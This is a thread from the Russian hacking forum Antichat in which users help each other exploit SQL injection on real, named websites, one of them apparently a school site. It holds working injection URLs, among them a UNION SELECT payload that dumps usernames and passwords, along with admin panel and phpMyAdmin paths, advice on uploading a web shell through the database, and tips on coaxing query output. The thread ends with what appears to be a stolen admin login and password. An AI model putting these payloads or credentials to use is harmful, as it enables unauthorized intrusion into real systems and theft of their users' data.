Форум АНТИЧАТ - хелп со скулем

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - хелп со скулем (https://forum.antichat.xyz/showthread.php?t=47839)

хелп со скулем

так, во первых, скажите мне, пожалуйста, где здесь одминка? :) :http://sofs.ru

во-вторых:
http://gym1517.ru/download.php?key=1+order+by+4
делаю юнион+1,2,3,4 - ошибка все равно вылезает
http://gym1517.ru/index.php?page=online&msg=18+order+by+7
делаю юнион - ни одного поля.
что делать? xD

Цитата:

http://gym1517.ru/index.php?page=online&msg=18+and(1=2)+union+select +1,concat(username,0x3a,passwd),3,4,5,6,7+from+use r/*

Цитата:

http://gym1517.ru/admin/

наслаждайся :)

На http://sofs.ru нашел только phpMyAdmin:

Цитата:

http://sofs.ru/phpMyAdmin/

, что логично))

Ну если прав хватит на mysql.user (если у тебя там скуля) то через БД зальешь шелл :)

З.Ы. на будущее: Если поля сами по себе не появились, нужно сделать ошибку в синтаксисе запроса, как например здесь 1=2, ведь 1 не равно 2? :) Или просто минус поставить, т.е. msg=-18 или msg[]=18 (иногда прокатывает), или msg=999999999999999, т.е. число, которого нет в БД. Ну вообщем понятно)

Цитата:

Сообщение от n0ne

наслаждайся :)

На http://sofs.ru нашел только phpMyAdmin:

, что логично))

я тож нашел, но юзвер и пасс не подходят туда.

Цитата:

З.Ы. на будущее: Если поля сами по себе не появились, нужно сделать ошибку в синтаксисе запроса, как например здесь 1=2, ведь 1 не равно 2? :) Или просто минус поставить, т.е. msg=-18 или msg[]=18 (иногда прокатывает), или msg=999999999999999, т.е. число, которого нет в БД. Ну вообщем понятно)

тут фишка-то в том, что отчеты об ошибках отключены. линк, который ты мне дал - пустая страница... а вообще спасибо :)

Ты бы пробелы убрал, хекер)

Цитата:

admin507:gym1517admin